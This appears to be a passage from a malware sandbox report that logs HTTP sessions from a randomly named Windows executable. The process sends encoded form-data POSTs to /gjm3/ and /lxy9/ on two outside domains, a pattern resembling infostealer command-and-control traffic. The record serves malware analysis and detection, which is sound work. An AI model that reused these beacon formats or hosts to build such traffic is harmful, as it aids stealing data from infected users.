Jul 26, 2024 09:41:59.249332905 CEST	785	OUT	POST /gjm3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.kawambwa-sugar.com Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.kawambwa-sugar.com Referer: http://www.kawambwa-sugar.com/gjm3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 43 63 2f 77 38 43 53 30 62 7a 53 45 69 58 39 64 6c 36 74 37 67 4e 35 43 42 5a 6f 71 67 57 78 6a 78 5a 65 4d 32 7a 4c 32 46 33 72 73 5a 63 41 52 39 4a 34 6c 68 66 62 7a 50 31 7a 41 53 4f 49 73 48 43 6e 51 30 69 56 47 45 71 48 55 6c 75 43 7a 30 50 72 34 72 71 38 5a 4b 55 2f 37 35 72 53 51 5a 65 46 67 4d 57 56 76 34 6d 4f 78 61 61 2f 49 50 71 44 6d 30 50 32 2b 6f 32 51 6e 37 49 37 71 57 4f 35 7a 39 57 65 63 32 49 4c 50 41 44 4e 4b 4f 58 30 31 6a 62 49 64 7a 79 44 6e 2f 2b 46 70 63 6c 52 48 59 6a 45 48 6f 4c 6f 76 39 54 52 4b 6a 4f 43 50 2f 6a 30 67 44 59 48 6c 35 38 6a 6a 61 77 59 4b 53 48 51 3d Data Ascii: JNx8tTw=Cc/w8CS0bzSEiX9dl6t7gN5CBZoqgWxjxZeM2zL2F3rsZcAR9J4lhfbzP1zASOIsHCnQ0iVGEqHUluCz0Pr4rq8ZKU/75rSQZeFgMWVv4mOxaa/IPqDm0P2+o2Qn7I7qWO5z9Wec2ILPADNKOX01jbIdzyDn/+FpclRHYjEHoLov9TRKjOCP/j0gDYHl58jjawYKSHQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49729	3.33.130.190	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:01.870256901 CEST	805	OUT	POST /gjm3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.kawambwa-sugar.com Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.kawambwa-sugar.com Referer: http://www.kawambwa-sugar.com/gjm3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 43 63 2f 77 38 43 53 30 62 7a 53 45 69 33 74 64 6e 5a 31 37 6d 74 35 46 43 5a 6f 71 75 47 78 6e 78 5a 53 4d 32 79 4f 37 45 44 48 73 5a 2b 49 52 76 39 55 6c 69 66 62 7a 62 6c 7a 42 63 75 4a 67 48 46 75 76 30 69 70 47 45 71 54 55 6c 76 79 7a 30 38 7a 37 71 36 38 66 54 45 2f 6c 6e 62 53 51 5a 65 46 67 4d 57 51 30 34 6d 6d 78 61 71 76 49 49 2b 66 6c 33 50 32 39 76 32 51 6e 2f 49 37 75 57 4f 35 4e 39 58 44 4c 32 4f 48 50 41 43 39 4b 4f 6d 30 32 71 62 49 62 39 53 43 6e 76 2b 30 4c 56 6b 70 6e 52 68 74 31 77 34 49 56 31 46 38 67 35 73 4b 6e 73 44 59 59 54 4c 50 53 6f 4d 43 4b 41 54 49 36 4d 51 47 4d 76 59 35 66 53 42 58 68 64 44 70 7a 55 61 47 62 70 35 79 54 Data Ascii: JNx8tTw=Cc/w8CS0bzSEi3tdnZ17mt5FCZoquGxnxZSM2yO7EDHsZ+IRv9UlifbzblzBcuJgHFuv0ipGEqTUlvyz08z7q68fTE/lnbSQZeFgMWQ04mmxaqvII+fl3P29v2Qn/I7uWO5N9XDL2OHPAC9KOm02qbIb9SCnv+0LVkpnRht1w4IV1F8g5sKnsDYYTLPSoMCKATI6MQGMvY5fSBXhdDpzUaGbp5yT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49730	3.33.130.190	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:04.459798098 CEST	1822	OUT	POST /gjm3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.kawambwa-sugar.com Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.kawambwa-sugar.com Referer: http://www.kawambwa-sugar.com/gjm3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 43 63 2f 77 38 43 53 30 62 7a 53 45 69 33 74 64 6e 5a 31 37 6d 74 35 46 43 5a 6f 71 75 47 78 6e 78 5a 53 4d 32 79 4f 37 45 44 50 73 59 4c 45 52 39 71 41 6c 6a 66 62 7a 59 6c 7a 4d 63 75 4a 70 48 45 4c 6d 30 69 6b 6b 45 76 58 55 6a 4e 36 7a 79 4e 7a 37 6b 36 38 66 4f 55 2f 34 35 72 54 55 5a 65 30 70 4d 57 41 30 34 6d 6d 78 61 70 48 49 65 36 44 6c 37 76 32 2b 6f 32 51 6a 37 49 37 4b 57 4f 67 31 39 57 33 62 32 2b 6e 50 41 69 74 4b 4d 30 63 32 68 62 49 5a 77 79 43 4a 76 2b 34 39 56 6c 46 4e 52 68 31 66 77 34 77 56 6c 77 63 33 6d 4f 36 2b 35 67 6b 36 53 6f 58 7a 34 6f 43 6f 41 43 45 66 4a 68 32 4b 71 63 38 32 52 6b 54 48 65 77 73 47 58 2b 36 4c 72 66 54 68 70 77 45 41 38 56 36 36 67 38 68 31 75 77 62 30 71 45 32 43 67 30 32 72 42 65 45 73 63 46 50 37 70 68 70 64 6e 62 76 43 6a 75 5a 70 45 79 48 4b 56 4e 33 67 48 37 45 46 4a 77 6d 4e 7a 49 6e 56 75 7a 71 64 51 53 59 64 52 78 45 4a 47 74 52 4f 6a 39 76 57 73 59 75 6a 67 37 46 54 34 79 37 50 53 72 4f 4a 56 6e 4c 2f 5a 67 6f 2f 39 5a [TRUNCATED] Data Ascii: JNx8tTw=Cc/w8CS0bzSEi3tdnZ17mt5FCZoquGxnxZSM2yO7EDPsYLER9qAljfbzYlzMcuJpHELm0ikkEvXUjN6zyNz7k68fOU/45rTUZe0pMWA04mmxapHIe6Dl7v2+o2Qj7I7KWOg19W3b2+nPAitKM0c2hbIZwyCJv+49VlFNRh1fw4wVlwc3mO6+5gk6SoXz4oCoACEfJh2Kqc82RkTHewsGX+6LrfThpwEA8V66g8h1uwb0qE2Cg02rBeEscFP7phpdnbvCjuZpEyHKVN3gH7EFJwmNzInVuzqdQSYdRxEJGtROj9vWsYujg7FT4y7PSrOJVnL/Zgo/9ZpT5fPHyrR3yhxJmcd6IAYBrDoAL56Ky3wvTCnwJCjrwohL10pHJr0CSYKIjqas/DeqXcax7C1Wc8QstFOjcGeevj8nzdOVeqsJ7MHmGIw3B+xyQsRiIQ4L4BDaRYqTxBwFr5byEFN4L2RFs7tGp0MepVZGMOqieyPNY8mYT4cSwaGo4wclR/ZCL/C4vJ5NbuDRC8rAKYzJhC1NQYsrUBwBm/FZgf53+kUfp7RA8Bg4V1pUsmzgaRg55Hc2vdSKlw4hlQOnmk4NwswKnTp2/T3ntBjB8HhigpgAeM1vtogEEWses80GDgTSzhPVqKOdY0DlN20+klgEHOhTV2X3OyIbu27onimqJuafOXegmkfVretByECfedkC6p9AAvI0QAxoh9bchYdcIIlNXJHK6Sx+OqRBJOAInOYrsNKNtr+OgBhcHCiierCLCZwD9P0DyYxd9a9tKKFruGKZhrJcOnp6qblEYOMakGQMwLEXClVHyDT8ffekTETZ64fcy9ovXfBS7PIOf1E801BILXEkhyNO3xlEAdRU3hqJEoROqH6vHuwluSkYyRvpJRm5+8cwfh4QNO8BDoPR+p14TVsQ2+E6FgVP+bg2j80aCRgQvU4Dz6hDnK4LX565BMzYRU4WIo23dHIbajN4T1OpUDtM11cJdiHoqVMFGwts [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49731	3.33.130.190	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:07.035057068 CEST	514	OUT	GET /gjm3/?JNx8tTw=PeXQ/0fKICzM5BJz6p9ArJpLN7UVrkFd1P+d/QKATQOsfeoG8d5Si8/kOzzLJ6xWOh7b+xseW4maj8a6yNy3oL5cFlzPj7mwU9Y3C34E4mLKEtfNI6H114erhWwp1eiAVA==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.kawambwa-sugar.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:42:07.484842062 CEST	409	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 07:42:07 GMT Content-Type: text/html Content-Length: 269 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 4e 78 38 74 54 77 3d 50 65 58 51 2f 30 66 4b 49 43 7a 4d 35 42 4a 7a 36 70 39 41 72 4a 70 4c 4e 37 55 56 72 6b 46 64 31 50 2b 64 2f 51 4b 41 54 51 4f 73 66 65 6f 47 38 64 35 53 69 38 2f 6b 4f 7a 7a 4c 4a 36 78 57 4f 68 37 62 2b 78 73 65 57 34 6d 61 6a 38 61 36 79 4e 79 33 6f 4c 35 63 46 6c 7a 50 6a 37 6d 77 55 39 59 33 43 33 34 45 34 6d 4c 4b 45 74 66 4e 49 36 48 31 31 34 65 72 68 57 77 70 31 65 69 41 56 41 3d 3d 26 46 30 61 3d 44 44 76 54 58 72 5f 48 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JNx8tTw=PeXQ/0fKICzM5BJz6p9ArJpLN7UVrkFd1P+d/QKATQOsfeoG8d5Si8/kOzzLJ6xWOh7b+xseW4maj8a6yNy3oL5cFlzPj7mwU9Y3C34E4mLKEtfNI6H114erhWwp1eiAVA==&F0a=DDvTXr_Hk"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49732	199.59.243.226	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:12.800295115 CEST	797	OUT	POST /lxy9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.counseloratlaw1806.xyz Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.counseloratlaw1806.xyz Referer: http://www.counseloratlaw1806.xyz/lxy9/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 58 4f 77 69 56 32 48 33 67 34 74 50 37 30 44 6b 35 46 56 6b 37 65 73 49 70 64 6c 55 45 73 32 33 55 54 65 51 41 4f 38 31 62 70 58 53 43 4b 41 35 65 66 39 6b 2f 72 65 35 5a 32 6e 33 55 64 72 4d 4e 57 35 79 31 47 4e 39 50 49 71 34 71 34 58 35 41 6e 4e 54 7a 68 52 67 55 61 66 4f 37 4c 54 6f 68 6e 6a 6d 77 43 4d 65 41 36 55 54 65 52 4f 4d 79 50 66 61 64 62 45 56 43 63 72 57 74 2f 6d 6c 48 74 53 69 70 30 6f 43 75 37 31 68 57 4a 46 53 32 63 42 41 32 65 61 38 2b 58 4c 6c 43 48 47 70 52 33 79 34 66 41 46 4e 36 4b 2f 6f 79 44 78 33 5a 35 4a 35 75 78 64 65 32 35 70 63 55 31 61 72 76 6b 55 6a 45 73 59 3d Data Ascii: JNx8tTw=XOwiV2H3g4tP70Dk5FVk7esIpdlUEs23UTeQAO81bpXSCKA5ef9k/re5Z2n3UdrMNW5y1GN9PIq4q4X5AnNTzhRgUafO7LTohnjmwCMeA6UTeROMyPfadbEVCcrWt/mlHtSip0oCu71hWJFS2cBA2ea8+XLlCHGpR3y4fAFN6K/oyDx3Z5J5uxde25pcU1arvkUjEsY=
Jul 26, 2024 09:42:13.232214928 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 07:42:13 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: afa49fa9-a8ad-48d2-8852-6c58525ae514 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw== set-cookie: parking_session=afa49fa9-a8ad-48d2-8852-6c58525ae514; expires=Fri, 26 Jul 2024 07:57:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 50 74 55 67 72 78 35 44 56 34 66 4c 2f 69 76 58 6e 52 6a 66 44 2f 42 45 6e 42 52 2b 6b 59 41 67 59 61 41 4c 73 47 34 4c 71 35 56 2b 35 39 2f 6c 44 5a 69 4d 43 31 66 54 75 6d 55 4d 67 70 4b 44 4f 59 74 33 33 71 70 43 75 39 6f 47 6d 77 53 2f 6c 48 74 75 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jul 26, 2024 09:42:13.232474089 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWZhNDlmYTktYThhZC00OGQyLTg4NTItNmM1ODUyNWFlNTE0IiwicGFnZV90aW1lIjoxNzIxOTc5Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49733	199.59.243.226	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:15.383358955 CEST	817	OUT	POST /lxy9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.counseloratlaw1806.xyz Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.counseloratlaw1806.xyz Referer: http://www.counseloratlaw1806.xyz/lxy9/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 58 4f 77 69 56 32 48 33 67 34 74 50 35 55 66 6b 37 6b 56 6b 79 65 73 50 73 64 6c 55 4f 4d 32 7a 55 54 53 51 41 4b 73 6c 61 62 44 53 62 75 45 35 64 61 52 6b 7a 4c 65 35 53 57 6e 79 4a 74 72 39 4e 57 30 4e 31 48 68 39 50 49 2b 34 71 34 6e 35 42 55 6c 51 7a 78 52 2b 65 4b 66 4d 32 72 54 6f 68 6e 6a 6d 77 43 6f 34 41 36 73 54 65 67 2b 4d 7a 75 66 5a 47 37 45 53 4b 38 72 57 2f 50 6d 35 48 74 53 4c 70 78 49 6f 75 35 39 68 57 4c 64 53 32 4e 42 42 34 65 61 36 78 33 4c 31 4e 43 7a 75 57 46 6a 35 66 41 39 4b 37 36 76 63 33 31 63 64 44 62 42 52 39 52 78 6d 6d 71 68 72 46 46 37 43 31 48 45 54 61 37 4e 59 4f 61 68 55 65 64 58 37 6a 54 42 6e 57 62 4a 4d 48 61 46 39 Data Ascii: JNx8tTw=XOwiV2H3g4tP5Ufk7kVkyesPsdlUOM2zUTSQAKslabDSbuE5daRkzLe5SWnyJtr9NW0N1Hh9PI+4q4n5BUlQzxR+eKfM2rTohnjmwCo4A6sTeg+MzufZG7ESK8rW/Pm5HtSLpxIou59hWLdS2NBB4ea6x3L1NCzuWFj5fA9K76vc31cdDbBR9RxmmqhrFF7C1HETa7NYOahUedX7jTBnWbJMHaF9
Jul 26, 2024 09:42:15.871201038 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 07:42:15 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 2b38123f-7670-4ddb-8cb8-fa7a95c2458e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw== set-cookie: parking_session=2b38123f-7670-4ddb-8cb8-fa7a95c2458e; expires=Fri, 26 Jul 2024 07:57:15 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 50 74 55 67 72 78 35 44 56 34 66 4c 2f 69 76 58 6e 52 6a 66 44 2f 42 45 6e 42 52 2b 6b 59 41 67 59 61 41 4c 73 47 34 4c 71 35 56 2b 35 39 2f 6c 44 5a 69 4d 43 31 66 54 75 6d 55 4d 67 70 4b 44 4f 59 74 33 33 71 70 43 75 39 6f 47 6d 77 53 2f 6c 48 74 75 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jul 26, 2024 09:42:15.872107029 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmIzODEyM2YtNzY3MC00ZGRiLThjYjgtZmE3YTk1YzI0NThlIiwicGFnZV90aW1lIjoxNzIxOTc5Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49734	199.59.243.226	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:17.977370977 CEST	1834	OUT	POST /lxy9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.counseloratlaw1806.xyz Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.counseloratlaw1806.xyz Referer: http://www.counseloratlaw1806.xyz/lxy9/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 58 4f 77 69 56 32 48 33 67 34 74 50 35 55 66 6b 37 6b 56 6b 79 65 73 50 73 64 6c 55 4f 4d 32 7a 55 54 53 51 41 4b 73 6c 61 62 37 53 48 4e 63 35 64 39 46 6b 77 4c 65 35 52 57 6e 7a 4a 74 72 61 4e 56 45 42 31 48 38 43 50 4c 47 34 71 62 66 35 47 6c 6c 51 6d 42 52 2b 57 71 66 4e 37 4c 54 39 68 6e 7a 36 77 43 59 34 41 36 73 54 65 69 6d 4d 30 2f 66 5a 42 4c 45 56 43 63 72 67 74 2f 6d 46 48 74 61 78 70 78 45 53 76 4b 6c 68 57 6f 6c 53 31 37 39 42 30 65 61 34 39 58 4b 71 4e 43 33 68 57 46 2b 43 66 41 49 66 37 34 50 63 31 44 4a 34 66 49 6c 6e 70 48 31 68 6f 4b 34 4e 48 42 76 35 30 57 67 49 53 34 31 47 44 35 78 2f 49 63 53 35 6e 68 51 77 56 66 4a 39 46 73 6b 4d 45 68 34 6a 72 6b 71 6e 37 68 62 63 6c 75 44 4e 4e 66 78 59 5a 64 37 50 61 6f 58 6b 65 73 55 78 51 75 52 59 68 43 61 71 77 2f 42 39 39 77 49 75 6a 4f 33 76 67 43 30 5a 63 47 43 4f 51 51 36 76 38 49 4c 6b 32 70 2b 4b 33 7a 65 78 65 6b 72 4e 45 6a 49 70 63 62 65 33 55 55 56 77 30 2b 69 35 4e 4e 31 4e 44 4a 58 70 58 65 6c 6b 38 70 [TRUNCATED] Data Ascii: JNx8tTw=XOwiV2H3g4tP5Ufk7kVkyesPsdlUOM2zUTSQAKslab7SHNc5d9FkwLe5RWnzJtraNVEB1H8CPLG4qbf5GllQmBR+WqfN7LT9hnz6wCY4A6sTeimM0/fZBLEVCcrgt/mFHtaxpxESvKlhWolS179B0ea49XKqNC3hWF+CfAIf74Pc1DJ4fIlnpH1hoK4NHBv50WgIS41GD5x/IcS5nhQwVfJ9FskMEh4jrkqn7hbcluDNNfxYZd7PaoXkesUxQuRYhCaqw/B99wIujO3vgC0ZcGCOQQ6v8ILk2p+K3zexekrNEjIpcbe3UUVw0+i5NN1NDJXpXelk8pa1LfA1JoQzyE4WRoFddnaDAub5DK6ATFBoag0CWk3vZ9TH+6PSBXFCfuT9+0cX7kRWMdlayNFGidAfd/nBnfNp8GfZpkFitaDc2sPvkOlTqbXefEuNYfvCzo5pHp0c2eXJ/u87K1xOLhRZdDazniaEtHjxVjr6jL0+QyobEZPF0ZaGjmiZaebM2keAQ38064FpoeGPdDAoDZB+HR/zlp35h/DCMbNzobuF/HfWQsyHraT/MaC9+WsX7ntys28dw9YZMD527BT9IrQiGa7fDC/4ZKKCx6q/RNofHciLBQbpeG14Xymr4u7RqMzeze8H7d8YszyHGKuz2Jxo85fsIaAC0eSYgs4DT7yjCr85OKJ21xz1baQH3yOWWu12d+pdLLEJ38UAzTzc7EWfQcXplioHDj7IAPxQDS6kAvUsDs3YkqVvp9Iwal1z5+IscOe54ESLEgo04ATeSCqBXzEtuUndeTIMyqOXGUZoD4ZO2fG8+fJo3oLZny/vWNkZpJ4GvG2g7Tj/2mGNjKqpgRuxMT7Y/WNCc9eHfBLeK0Ub3K0ocvpOGgzvo8W9/c27+wBT3CDLVAK/fB9ekxI05/DmGZRbMkkO2MyYbLJd/ReZsVrInRwo86Ye3NgKUavbtGVTXM922HapWuaETAKTm7jSja+Qi4bPAJFXhi2w [TRUNCATED]
